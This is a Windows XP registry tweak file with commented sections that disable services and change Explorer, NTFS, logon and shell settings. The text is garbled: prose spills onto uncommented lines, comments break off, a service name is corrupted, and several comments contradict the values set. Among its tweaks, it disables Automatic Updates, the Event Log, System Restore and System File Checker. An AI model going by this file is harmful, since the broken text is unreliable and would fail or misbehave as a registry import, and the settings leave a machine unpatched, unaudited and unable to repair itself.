@="Language bar"
"MenuTextPUI"="@%SystemRoot%\\System32\\msutb.dll,-325"
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\MenuOrder]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Start_NotifyNewApps"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NeroFilterCheck"=-
"nwiz"=-
"SunJavaUpdateSched"=-
"MsnMsgr"=-
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-
BFC1-08002BE10318}]
"UpperFilters"=-
"LowerFilters"=-
[HKEY_CLASSES_ROOT\CLSID\{D14ED2E1-C75B-443c-BD7C-FC03B2F08C17}]
@="TweakUI XP"
[HKEY_CLASSES_ROOT\CLSID\{D14ED2E1-C75B-443c-BD7C-FC03B2F08C17}\DefaultIcon]
@="%SystemRoot%\\\\System32\\\\tweakui.exe,0"
[HKEY_CLASSES_ROOT\CLSID\{D14ED2E1-C75B-443c-BD7C-FC03B2F08C17}\Shell\Open
\command]
@="tweakui.exe"
[HKEY_CLASSES_ROOT\CLSID\{D14ED2E1-C75B-443c-BD7C-FC03B2F08C17}\ShellFolder]
"Attributes"=dword:00000030
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\ControlPanel\NameSpace\{D14ED2E1-C75B-443c-BD7C-FC03B2F08C17}]
@="Tweak UI
PART 3
;=======================================================================
; Registery tweaks
;=======================================================================
; 1 - Start-up / Shutdown
; 2 - Services
; 4 - General Settings
; 5 - Logon
; 6 - Visual Settings
; 8 - Context Menus
; 10 - Security
; 11 - Multimedia
; 12 - Networking
; 13 - Other Software
; 14 - Win XP SP2
;=======================================================================
; 1 - Startup / Shutdown
;=======================================================================
;Allows boot files to be placed optimally on the hard-drive for faster boots.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction]
"Enable"="Y"
;Speed up shutdown
[HKEY_CURRENT_USER\Control Panel\Desktop]
"AutoEndTasks"="1"
"HungAppTimeout"="100"
"WaitToKillAppTimeout"="1000"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]
"WaitToKillServiceTimeout"="1000"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl]
"AutoReboot"=dword:00000000
;Prefetcher tweak (faster booting) boot and program prefetch use 00000003 or Boot
only 00000002
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
Management\PrefetchParameters]
;Clear the Page File at System Shutdown for security (makes shutdown slower when
activated)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
Management]
"ClearPageFileAtShutdown"=dword:00000001
;Disable Hibernate
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Power]
"Heuristics"=hex:05,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,3f,42,0f,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Reliability]
"ShutdownReasonOn"=dword:00000000
"ShutdownReasonUI"=dword:00000000
;=======================================================================
; 2 - Services
;=======================================================================
; Note: Change the values to set the services to automatic, manual or disable
; 00000002 = Automatic
; 00000003 = Manual
; 00000004 = Disabled
;Server
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon]
"Start"=dword:00000003
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xmlprov]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"Size"=dword:00000003
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MrxSmb\Parameters]
"RefuseReset"=dword:00000001
;Automatic Updates
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
"Start"=dword:00000004
;Disable UPS
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPS]
"Start"=dword:00000004
;Disable NVIDIA Driver Helper VIDIA Driver Helper Service which gets installed under
Windows NT4/2000/XP/2003 by the NVIDIA drivers for some of their graphics cards (or
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NVSvc]
"Start"=dword:00000004
Sharing (ICS) Provides network address translation, addressing, name resolution and/or
intrusion prevention services for a home or small office network. Used to allow
multiple computers on your network to access the internet via only one account. This
service installs on the "modem" computer. If you are using a third party firewall or
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
"Start"=dword:00000004
;Disable Telnet Service ,Enables a remote user to log on to this computer and run
programs, and supports various TCP/IP Telnet clients, including; UNIX-based and
might be unavailable. If this service is disabled, any services that explicitly depend on
it will fail to start. This service is not available on Windows XP Home. It allows remote
login to the local computer via the telnet function. For security reasons, disable this
unless you specifically require its functionality. You will save about 2 MB of RAM by
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr]
"Start"=dword:00000004
; Disable Web Client Service, Enables Windows-based programs to create, access, and
modify Internet-based files. If this service is stopped, these functions will not be
available. If this service is disabled, any services that explicitly depend on it will fail to
start. I have not found a reason to have this service running. I have a hunch that this is
going to be required for Microsoft's ".Net Software as a service." For security reasons, I
recommend for this service to be disabled. If some MS products, such as MSN Explorer,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WebClient]
"Start"=dword:00000004
;Disable Upload Manager Service , Manages synchronous and asynchronous file transfers
between clients and servers on the network. If this service is stopped, synchronous and
asynchronous file transfers between clients and servers on the network will not occur.
If this service is disabled, any services that explicitly depend on it will fail to start.
information. This service is not required for basic File and Print sharing. I do not have
yet to find a need for this service, nor do I wish to send my hardware information to
Microsoft.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\uploadmgr]
"Start"=dword:00000004
;Themes Service ,The themes service is responsible for Visual Styles. Using Microsoft®
Windows® XP, you can now define the visual style or appearance of controls and
windows from simple colors to textures and shapes. You can control each defined part
of a control as well as each part of the non-client (frame and caption) area of a
window. The user can then use the Appearance tab in the Windows Control Panel to
switch between the classic visual style and other available styles.A visual style is
included with the Windows XP release. Using helper libraries and application
programming interfaces (APIs),you can incorporate the Windows XP visual style into
your application with few code changes. For more information, see the Platform SDK
documentation in the MSDN Library.If your memory conscious and does not care about
the "new" XP look, disable this service to save RAM. I have observed between 4 MB to
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Themes]
"Start"=dword:00000002
;Disable Protected Storage Service, Provides protected storage for sensitive data, such
wise known as auto complete in Internet Explorer. Allows for the saving of local
disabled to make things all that much more difficult to steal vital information if you do
not "save" it. On the other hand, you may need this service to manage private keys for ;
encryption purposes. If so, leave this service on automatic to ensure the "higher"
security settings you choose work. If you disable this service, you will no longer have
any of your passwords saved, no matter how many times you click the box. If you enjoy
having your passwords saved in applications like Outlook or Dial up networking or you
authentication
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ProtectedStorage]
"Start"=dword:00000004
;Disable Fast User Switching Service, Provides management for applications that
require assistance in a multiple user environment. This service is responsible for letting
you stayed logged in as more than one user. Unless you have many users on a system,
you probably do not even need this service to be running. You could benefit, however,
greatly if you use this service in conjunction with many users on your local computer to
allow switching users without closing all existing applications running under a different
account.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
\FastUserSwitchingCompatibility]
"Start"=dword:00000002
network and supplies this list to computers designated as browsers. If this service is
stopped, this list will not be updated or maintained. If this service is disabled, any
services that explicitly depend on it will fail to start. Computer Browser service
maintains a listing of computers and resources located on the network. This service is
not required on a standalone system. In fact, even if you want to browse the network
(workgroup or domain) or have mapped network shares as local hard drives, you can
still do so. On a large network, one computer is designated the "master" browser and
another one is the "backup" browser. All others just announce they are available every
12 minutes to "take over" duties if one of the other computers fail. No lag time is
discernable if this service remains disabled on all but one computer. Honestly, I donot
even believe one needs to be running. You could, "just in case," but it sure does not
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Browser]
"Start"=dword:00000004
;Disable Help and Support Service, Enables Help and Support Center to run on this
computer. If this service is stopped, Help and Support Center will be unavailable. If
this service is disabled, any services that explicitly depend on it will fail to start. This
service is required for Microsoft's online (or offline) help documents. If you ever
"attempt" to use Help and Support, theservice places itself back into "Automatic" and
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\helpsvc]
"Start"=dword:00000004
;Disable Task Scheduler Service ,Enables a user to configure and schedule automated
tasks on this computer. If this service is stopped, these tasks will not be run at their
scheduled times. If this service is disabled, any services that explicitly depend on it
will fail to start. You use this service to schedule maintenance, Microsoft Backup
sessions, or maybe even Auto Update. I do everything manually, to avoid having this
service running all the time. Some third party software may require this service to be
active for ;automated functions, such as virus scanners, system maintenance tools, and
automatic patch/driver look ups.Take note:BootVis requires Task Scheduler and COM+
Event System to be running if you wish to take advantage of the "optimize system"
function. Why may you need this service? It is due to the pre-fetching function built
into Windows XP.Another Note: Pre-fetching only occurs on boot up and application
start, so if you do not care about a few extra seconds of boot time, do not even bother
with it and disable Task Scheduler. On some applications, the pre-fetching feature
really does help. Only you candecide whether to use its functionality and if it helps in
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule]
"Start"=dword:00000004
;Set Print Spooler to "Auto" Service Loads files to memory for later printing. Queues up
print jobs for later printing. This service is required if you have printers, even if they
are network printers. If this does not fit your needs, disable it. You will save about 3.8
MB by making this service go away. Your printers will still be" installed" if you disable
this service, but not visible in the printers folder. After restarting Print Spooler, they
will re appear and be available for use. I place this service into manual mode and only
start it up when printing is required. In manual mode, the service will not
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler]
"Start"=dword:00000002
credentials. If this service is stopped, this type of logon access will be unavailable. If
this service is disabled, any services that explicitly depend on it will fail to start.
Enables starting processes under alternate credentials. I have never found a reason to
keep this service running. I have always considered "Alternate Credentials" someone
other than me! Not my idea of fun... Really, though, it allows a "limited user" account
account or another user. You can also have a privileged user start an application or
process with limited privileged account. If you right-click a file, the menu will display
"Run As" option. If you disable this service, that function will no longer be available.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saloon]
"Start"=dword:00000004
;Disable Performance Logs & Alerts Service ,Collects performance data from local or
remote computers based on preconfigured schedule parameters, then writes the data
to a log or triggers an alert. If this service is stopped, performance information will not
be collected. If this service is disabled, any services that explicitly depend on it will
fail to start. Collect performance data on a schedule and send the information to a log
or trigger an alert. This may be a super geek tool, but I feel that the overhead
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SysmonLog]
"Start"=dword:00000004
; Disable Telephony Service ,Provides Telephony API (TAPI) support for programs that
control telephony devices and IP based voice connections on the local computer and,
through the LAN, on servers that are also running the service. Controls telephony
devices on the local computer. This service is required for dial-up modem connectivity.
Note: you may require this service for some direct cable or DSL providers, depending
on how they implement their logon process or some AOL functionality, depending on
software used. If Dial-up, cable or DSL internet access no longer functions properly
with this service disabled, place it into automatic. If you are connecting via a hardware
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TapiSrv]
"Start"=dword:00000004
;Disable Wireless Zero Configuration Service ,Provides automatic configuration for the
802.11 adapters Provides automatic configuration for wireless network devices and
connection quality feedback. If you do not have any wireless network devices in use on
the local system, disable this service. You may require this service for connectivity
with some "hot sync" software for a PDA, laptop or other portable computer.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WZCSVC]
"Start"=dword:00000004
;Disable TCP/IP NetBIOS Helper Service ,Enables support for NetBIOS over TCP/IP
(NetBT) service and NetBIOS name resolution. This feature provides legacy support for
NetBIOS over TCP/IP. If your network does not use NetBIOS and / or WINS, disable; this
function.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LmHosts]
"Start"=dword:00000004
;Disable Remote Desktop Help Session Manager Service ,Manages and controls Remote
stopping this service, see the Dependencies tab of the Properties dialog box. Manages
and controls Remote Assistance. If you do not want or need to use this feature, disable
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RDSessMgr]
"Start"=dword:00000004
;Disable Routing and Remote Access Service ,Offers routing services to businesses in
local area and wide area network environments. Allows computers to dial in to the
local computer through a modem (or other devices) to access the local network using a
standard or VPN connection. Unless you require this functionality, disable it for
security reasons. Upon enabling this service,” Incoming Connections" icon will be
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess]
"Start"=dword:00000004
;Disable Clip Book Service ,Enables Clip Book Viewer to store information and share it
with remote computers. If the service is stopped, Clip Book Viewer will not be able to
share information with remote computers. If this service is disabled, any services that
explicitly depend omit will fail to start. Used to store information (cut / paste) and
share it with other computers. I have never found enough need for this to allow this
service to always be running. This service alone uses about 1.3 MB of memory.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ClipSrv]
"Start"=dword:00000004
;Disable Error Reporting Service ,Allows error reporting for services and applications
occur. I personally do not like this. I feel it is a waste of memory and resources. On the
other hand, if you are experiencing system crashes often, the best way to deal with
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ERSvc]
"Start"=dword:00000004
; Disable Indexing Service ,Indexes contents and properties of files on local and remote
computers; provides rapid access to files through flexible querying language. This
service always has been a major resource hog. I NEVER recommend having this service
enabled. Remove the function via the "Add / Remove Programs" icon in the control
panel (Windows Setup Programs). It uses about 500 K to 2 MB in an idle state, not to
mention the amount of memory and CPU resources it takes to INDEX the drives. I have
had people (and witnessed it on other people's computers) report to me that the
Indexing Service sometimes starts up EVEN while the systemise NOT idle... as in the
middle of a game. You may feel, as I do, that this is unacceptable. If your computer
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\cisvc]
"Start"=dword:00000004
will be unable to record CDs. If this service is disabled, any services that explicitly
depend on it will fail to start. This service operates that cool "drag and drop" CD burn
capability. You will need this service to burn CD's. What is the goodness? If you set this
service to manual, the service starts and stops itself when used with some software
packages. This is practically the only service that does do this! If you still cannot burn a
CD with it on manual, switch to automatic and feel safe that it starts only when
"needed." This service may take up about 1.6 MB of memory in an idle state.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ImapiService]
"Start"=dword:00000004
;Disable Messenger Service (to stop spam. Does not affect MSN or Windows Messenger
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Messenger]
"Start"=dword:00000004
;Disable Remote Registry Service ,Enables remote users to modify registry settings on
this computer. If this service is stopped, the registry can be modified only by users on
this computer. If this service is disabled, any services that explicitly depend on it will
fail to start. This feature is not available on Windows XP Home. This is one of those not
needed services. One of the first I disable. If you’re paranoid about security, disable
this service. Even if you are not or do not care, disable it anyway. DISABLE IT NOW!!
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteRegistry]
"Start"=dword:00000004
devices on your home network. Used to locate UPnP devices on your home network.
Used in conjunction with Universal Plug and Play Device Host, it detects and configures
UPnP devices on your home network. For security reasons and for the fact that I doubt
that you have any of these devices, disable this service. If any EXTERNAL device does
not function because of this service being disabled, place it back in to automatic. MSN
Messenger uses this service in conjunction with supported UPnP devices, to provide
support for networks behind a NAT firewall or router. Also, if you are experiencing
automatic and ensure you download all security updates. The problem that I have
found with this service is that it broadcasts UDP port 1900 "a lot." If you notice plenty
of network activity even though nothing is happening, this service is sometimes the
cause. Take note: UPnP is NOT PnP. UPnP is for connectivity on networks via TCP/IP to
devices, such as scanners or printers. Your sound card is PnP. Do NOT disable Plug and
Play service.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSDPSRV]
"Start"=dword:00000004
;Disable Universal Plug'n'Play Service ,Provides support to host Universal Plug and Play
devices. Used in conjunction with SSDP Discovery Service, it detects and configures
UPnP devices on your home network. For security reasons and for the fact that I doubt
that you have any of these devices, disable this service. If any EXTERNAL device does
not function because of this service being disabled, place it back in to automatic. MSN
Messenger uses this service in conjunction with supported UPnP devices, to provide
support for networks behind a NAT firewall or router. Also, if you are experiencing
difficulty connecting to multiplayer games that use DirectX(7,8,and 9), place this
service to automatic and ensure you download all security updates. Furthermore, if you
use Internet Connection Sharing and wish to make use of the "allow others to modify
this connection" feature, enable UPnP. Take note: UPnP is NOT PnP. UPnP is for
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\upnphost]
"Start"=dword:00000004
;Disable Windows Time Service ,Maintains date and time synchronization on all clients
and servers in the network. If this service is stopped, date and time synchronization
will be unavailable. If this service is disabled, any services that explicitly depend on it
will fail to start. Automatically sets your clock by contacting a server (Microsoft's
server by default) on the internet. Great idea if your network connects to the internet
24/7. The Event Log fills up with "cannot find server" messages on a non-dedicated
setup, though. After successful synchronizing, this service will not attempt to do it
again for 7 days, meanwhile, taking up resources. You may also need Task Scheduler
running. You may choose to set your clock manually on a dial up connection, but with a
24/7broadband setup, this could keep you on time for work. Note: as mentioned, "time.
windows.com" is the default server for synchronization. For those privacy conscious
people that prefer to connect to a government site rather then MS, use ;"time.nist.gov."
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time]
"Start"=dword:00000004
;Disable Background Intelligent Transfer Service (needs to be on for SP2 Windows Auto
Updates)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS]
"Start"=dword:00000003
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srservice]
"Start"=dword:00000002
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TrkWks]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SCardSvr]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SCardDrv]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RSVP]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasAuto]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mnmsrvc]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmiApSrv]
"Start"=dword:00000004
;=======================================================================
;=======================================================================
;These NTFS tweaks improve file system performance (Speed up NTFS) Note: these
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem]
"NtfsDisable8dot3NameCreation"=dword:00000001
"NtfsDisableLastAccessUpdate"=dword:00000001
"Win95TruncatedExtensions"=dword:00000001
"Win31FileSystem"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
Management]
"IoPageLockLimit"=dword:00020000
[-HKEY_CLASSES_ROOT\.zip\CompressedFolder]
[-HKEY_CLASSES_ROOT\CLSID\{E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31}]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CompressedFolder]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\stisvc]
"Start"=dword:00000004
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSaveSettings"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"NoNetCrawling"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
\Explorer]
"NoRemoteRecursiveEvents"=dword:00000001
;Disable Windows Installer Rollback (faster msi installs, dot.net framework wont install
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer]
"DisableRollback"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\AlwaysUnloadDLL]
@="1"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
Management]
"DisablePagingExecutive"=dword:00000001
;=======================================================================
; 5 - General Settings
;=======================================================================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
\SystemRestore]
"DisableSR"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
"RegisteredOwner"="Kill-a-bee"
"RegisteredOrganization"="WinXp Customized"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\BrowseNewProcess]
"BrowseNewProcess"="Yes"
;Opens 16-bit apps in a separate memory space, this increases stability when dealing
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WOW]
"DefaultSeparateVDM"="Yes"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\BitBucket]
"Percent"=dword:00000003
"NukeOnDelete"=dword:00000000
;Keyboard Num-Lock on
[HKEY_CURRENT_USER\Control Panel\Keyboard]
"InitialKeyboardIndicators"="2"
[HKEY_CLASSES_ROOT\lnkfile]
"IsShortCut"=-
[HKEY_CLASSES_ROOT\piffile]
"IsShortCut"=-
[HKEY_CLASSES_ROOT\InternetShortcut]
"IsShortCut"=-
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop
\CleanupWiz]
"NoRun"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:000000FF
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"ForceClassicControlPanel"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000091
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\Usb\0000]
"IdleEnable"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.
nfo]
"Application"="NOTEPAD.EXE"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.
nfo\OpenWithList]
"a"="Explorer.exe"
"MRUList"="ba"
"b"="NOTEPAD.EXE"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.
nfo\OpenWithProgids]
"MSInfo.Document"=hex(0):
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting]
"AllOrNone"=dword:00000001
"DoReport"=dword:00000000
"IncludeKernelFaults"=dword:00000000
"IncludeMicrosoftApps"=dword:00000000
"IncludeWindowsApps"=dword:00000000
"ShowUI"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"SearchSystemDirs"=dword:00000001
"SearchHidden"=dword:00000001
"IncludeSubFolders"=dword:00000001
"CaseSensitive"=dword:00000000
"SearchSlowFiles"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Search Assistant]
"Actor"=""
"SocialUI"=dword:00000000
"UsageCount"=dword:00000000
"UseAdvancedSearchAlways"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ContentIndex]
"FilterFilesWithUnknownExtensions"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
"CompletionChar"=dword:00000009
[-HKEY_CLASSES_ROOT\.bfc\ShellNew]
[-HKEY_CLASSES_ROOT\.rtf\ShellNew]
[-HKEY_CLASSES_ROOT\.bmp\ShellNew]
[-HKEY_CLASSES_ROOT\.wav\ShellNew]
[-HKEY_CLASSES_ROOT\.zip\CompressedFolder\ShellNew]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"link"=hex:00,00,00,00
[HKEY_CURRENT_USER\Control Panel\Sound]
"beep"="no"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager
\Environment]
"DEVMGR_SHOW_DETAILS"=dword:00000001
"DEVMGR_SHOW_NONPRESENT_DEVICES"="1"
;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
;"NoSMBalloonTip"=dword:00000000
;scanner or Camera on your desktop when you connect it with the USB cable
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop
\NameSpace\DelegateFolders\{E211B736-43FD-11D1-9EFB-0000F8757FCD}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"SFCSetting"=dword:ffffff9d
"SFCDisable"=dword:ffffff9d
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoCDBurning"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion]
"RegDone"="1"
;=======================================================================
;=======================================================================
[HKEY_Current_User\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoTrayItemsDisplay"=dword:00000001
;lock taskbar
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"TaskbarSizeMove"=dword:00000000
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"ShellState"=hex:24,00,00,00,11,28,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
01,00,00,00,0d,00,00,00,00,00,00,00,02,00,00,00
[HKEY_CURRENT_USER\Control Panel\desktop]
"ForegroundLockTimeout"=dword:00030d40
; cmd prompt enhancements: tab key completes path+filenames, UNC checks off
[HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor]
"CompletionChar"=dword:00000008
"PathCompletionChar"=dword:00000008
"DisableUNCCheck"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"MemCheckBoxInRunDlg"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"forceguest"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\HideDesktopIcons\NewStartPanel]
"{20D04FE0-3AEA-1069-A2D8-08002B30309D}"=dword:00000000
"{450D8FBA-AD25-11D0-98A8-0800361B1103}"=dword:00000000
"{208D2C60-3AEA-1069-A2D7-08002B30309D}"=dword:00000000
"{871C5380-42A0-1069-A2EA-08002B30309D}"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSharedDocuments"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSharedDocuments"=dword:00000001
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\MyComputer\NameSpace\DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee}]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"ClearRecentDocsOnExit"=dword:00000001
;Won't check if you are low on disk space and pop up a balloon telling you, No
Instrumentation disables windows user tracking and cause the recent used programs
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiskSpaceChecks"=dword:00000001
"NoInstrumentation"=dword:00000001
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters]
"DiskSpaceThreshold"=dword:00000005
[HKEY_CURRENT_USER\Software\Microsoft\W
indows\CurrentVersion\Policies\Explorer]
"NoStrCmpLogical"=dword:00000001
;cached "folder-view settings", currently 250 (to speed-up browsing local folders)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell]
"BagMRU Size"=dword:000000FA
[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam]
"BagMRU Size"=dword:000000FA
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
;"ThumbnailSize"=dword:00000020
"ThumbnailQuality"=dword:0000001E
;0 = windows default
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"ShowDriveLettersFirst"=dword:00000002
; Change Drive name and icon You have to change the \C\ below to the drive you want
to change
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\DriveIcons\C\DefaultLabel]
@="Local OS"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\DriveIcons\C\DefaultIcon]
""="c:\icons\myicons.dll,4"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\Advanced\Folder\SuperHidden]
"DefaultValue"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Streams]
